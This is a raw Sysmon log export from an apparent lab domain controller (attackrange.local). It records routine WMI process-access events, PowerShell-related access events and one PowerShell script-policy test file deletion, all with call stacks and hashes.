16:54:43.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242774Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242773Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.139{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-D9AA-00000000AD01}4448C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242772Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.139{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-D9AA-00000000AD01}4448C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242771Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242770Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242769Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242768Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242767Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242766Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242765Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242764Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242763Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242762Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.139{05ADC7E1-6DD3-603E-D9AA-00000000AD01}44484024C:\Windows\system32\conhost.exe{05ADC7E1-6DD3-603E-D8AA-00000000AD01}14280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242761Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242760Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242759Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242758Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242757Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.123{05ADC7E1-6DD3-603E-D6AA-00000000AD01}10156ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_2ggsm4af.jkg.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242756Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.123{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-D4AA-00000000AD01}15248C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242755Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242754Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.123{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-D4AA-00000000AD01}15248C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242753Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242752Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 